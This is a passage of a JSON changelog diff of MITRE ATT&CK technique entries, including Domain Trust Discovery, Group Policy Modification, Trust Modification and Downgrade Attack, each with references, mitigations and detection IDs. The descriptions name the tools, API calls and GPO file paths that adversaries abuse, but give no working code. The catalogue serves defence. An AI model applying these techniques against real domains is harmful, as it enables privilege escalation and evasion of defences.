+                            "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20210126065851/https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+                        },
+                        {
+                            "source_name": "Kaspersky StoneDrill 2017",
+                            "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.",
+                            "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Sysmon v6 May 2017",
+                            "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.",
+                            "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon"
+                        },
+                        {
+                            "source_name": "Symantec Shamoon 2012",
+                            "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.",
+                            "url": "https://www.symantec.com/connect/blogs/shamoon-attacks"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_impact_type": [
+                        "Availability"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2025-10-24 17:48:22.482000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1053: Data Backup"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0297: Detection Strategy for Disk Structure Wipe via Boot/Partition Overwrite"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-02-14 16:15:05.974000+00:00",
+                    "modified": "2026-05-12 15:12:00.642000+00:00",
+                    "name": "Domain Trust Discovery",
+                    "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1482",
+                            "external_id": "T1482"
+                        },
+                        {
+                            "source_name": "Microsoft Operation Wilysupply",
+                            "description": "Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.",
+                            "url": "https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/"
+                        },
+                        {
+                            "source_name": "AdSecurity Forging Trust Tickets",
+                            "description": "Metcalf, S. (2015, July 15). It\u2019s All About Trust \u2013 Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved February 14, 2019.",
+                            "url": "https://adsecurity.org/?p=1588"
+                        },
+                        {
+                            "source_name": "Microsoft Trusts",
+                            "description": "Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)"
+                        },
+                        {
+                            "source_name": "Microsoft GetAllTrustRelationships",
+                            "description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.",
+                            "url": "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships"
+                        },
+                        {
+                            "source_name": "Harmj0y Domain Trusts",
+                            "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.",
+                            "url": "https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dave Westgard",
+                        "Elia Florio, Microsoft",
+                        "Mnemonic",
+                        "RedHuntLabs, @redhuntlabs",
+                        "ExtraHop"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.642000+00:00\", \"old_value\": \"2025-10-24 17:48:58.061000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0007: Detection of Domain Trust Discovery via API, Script, and CLI Enumeration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-07 14:10:32.650000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Domain or Tenant Policy Modification",
+                    "description": "Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.\n\nModifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.\n\nWith sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  \n\n* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)\n* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)\n* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).\n* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)\n\nAdversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1484",
+                            "external_id": "T1484"
+                        },
+                        {
+                            "source_name": "ADSecurity GPO Persistence 2016",
+                            "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.",
+                            "url": "https://adsecurity.org/?p=2716"
+                        },
+                        {
+                            "source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks",
+                            "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.",
+                            "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"
+                        },
+                        {
+                            "source_name": "Okta Cross-Tenant Impersonation 2023",
+                            "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.",
+                            "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
+                        },
+                        {
+                            "source_name": "Wald0 Guide to GPOs",
+                            "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.",
+                            "url": "https://wald0.com/?p=179"
+                        },
+                        {
+                            "source_name": "Harmj0y Abusing GPO Permissions",
+                            "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024.",
+                            "url": "https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Obsidian Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows",
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "4.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-16 20:07:53.114000+00:00\"}}}",
+                    "previous_version": "4.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0270: Detection of Domain or Tenant Policy Modifications via AD and Identity Provider"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-12-28 21:50:59.844000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Group Policy Modification",
+                    "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml</code>.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1484/001",
+                            "external_id": "T1484.001"
+                        },
+                        {
+                            "source_name": "Mandiant M Trends 2016",
+                            "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"
+                        },
+                        {
+                            "source_name": "ADSecurity GPO Persistence 2016",
+                            "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.",
+                            "url": "https://adsecurity.org/?p=2716"
+                        },
+                        {
+                            "source_name": "Microsoft Hacking Team Breach",
+                            "description": "Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.",
+                            "url": "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/"
+                        },
+                        {
+                            "source_name": "Wald0 Guide to GPOs",
+                            "description": "Robbins, A. (2018, April 2). A Red Teamer\u2019s Guide to GPOs and OUs. Retrieved March 5, 2019.",
+                            "url": "https://wald0.com/?p=179"
+                        },
+                        {
+                            "source_name": "Harmj0y Abusing GPO Permissions",
+                            "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved September 23, 2024.",
+                            "url": "https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
+                        },
+                        {
+                            "source_name": "Harmj0y SeEnableDelegationPrivilege Right",
+                            "description": "Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved September 23, 2024.",
+                            "url": "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/"
+                        },
+                        {
+                            "source_name": "TechNet Group Policy Basics",
+                            "description": "srachui. (2012, February 13). Group Policy Basics \u2013 Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.",
+                            "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Itamar Mizrahi, Cymptom",
+                        "Tristan Bennett, Seamless Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-16 20:07:52.883000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0305: Detection of Group Policy Modifications via AD Object Changes and File Activity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-12-28 21:59:02.181000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "Trust Modification",
+                    "description": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS re Inforce Trust Mod)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1484/002",
+                            "external_id": "T1484.002"
+                        },
+                        {
+                            "source_name": "AWS re Inforce Trust Mod",
+                            "description": "AWS re Inforce. (2024, June). Retrieved April 15, 2026.",
+                            "url": "https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf"
+                        },
+                        {
+                            "source_name": "AADInternals zure AD Federated Domain",
+                            "description": "Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.",
+                            "url": "https://o365blog.com/post/federation-vulnerability/"
+                        },
+                        {
+                            "source_name": "Microsoft - Azure AD Federation",
+                            "description": "Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed"
+                        },
+                        {
+                            "source_name": "Okta Cross-Tenant Impersonation 2023",
+                            "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.",
+                            "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Blake Strom, Microsoft 365 Defender",
+                        "Praetorian",
+                        "Obsidian Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Identity Provider",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-16 20:07:52.987000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0458: Detection of Trust Relationship Modifications in Domain or Tenant Policies"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--30904c16-39f9-41c6-b01a-500eb8878442",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:28.276000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Downgrade Attack",
+                    "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system\u2019s backward compatibility to force it into less secure modes of operation.\n\nAdversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to impair defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike downgrade attack)(Citation: Google Cloud downgrade attack)(Citation: att_def_ps_logging)\n\nAdversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: CrowdStrike Downgrade attack 2) On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.(Citation: SafeBreach)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1689",
+                            "external_id": "T1689"
+                        },
+                        {
+                            "source_name": "SafeBreach",
+                            "description": "Alon Leviev. (2024, August 7). Windows Downdate: Downgrade Attacks Using Windows Updates. Retrieved January 8, 2025.",
+                            "url": "https://www.safebreach.com/blog/downgrade-attacks-using-windows-updates/"
+                        },
+                        {
+                            "source_name": "CrowdStrike Downgrade attack 2",
+                            "description": "Bart Lenaerts-Bergmans. (2023, March 13). What are Downgrade Attacks?. Retrieved April 15, 2026.",
+                            "url": "https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/downgrade-attack/"
+                        },
+                        {
+                            "source_name": "Targeted SSL Stripping Attacks Are Real",
+                            "description": "Check Point. (n.d.). Targeted SSL Stripping Attacks Are Real. Retrieved May 24, 2023.",
+                            "url": "https://blog.checkpoint.com/research/targeted-ssl-stripping-attacks-are-real/amp/"
+                        },
+                        {
+                            "source_name": "CrowdStrike downgrade attack",
+                            "description": "Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved April 15, 2026.",
+                            "url": "https://www.crowdstrike.com/en-us/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/"
+                        },
+                        {
+                            "source_name": "att_def_ps_logging",
+                            "description": "Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.",
+                            "url": "https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/"
+                        },
+                        {
+                            "source_name": "Google Cloud downgrade attack",
+                            "description": "Nathan Kirk. (2018, June 18). Bring Your Own Land (BYOL) \u2014 A Novel Red Teaming Technique. Retrieved April 15, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/bring-your-own-land-novel-red-teaming-technique/"
+                        },
+                        {
+                            "source_name": "Praetorian TLS Downgrade Attack 2014",
+                            "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.",
+                            "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arad Inbar, Fidelis Security",
+                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
+                        "Mayuresh Dani, Qualys"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS",
+                        "Windows",
+                        "Linux"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2026-04-22 15:44:42.756000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0350: Detecting Downgrade Attacks"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-10 17:28:11.747000+00:00",
+                    "modified": "2026-05-12 15:12:00.644000+00:00",
+                    "name": "Dynamic Resolution",
+                    "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1568",
+                            "external_id": "T1568"
+                        },
+                        {
+                            "source_name": "Talos CCleanup 2017",
+                            "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.",
+                            "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"
+                        },
+                        {
+                            "source_name": "FireEye POSHSPY April 2017",
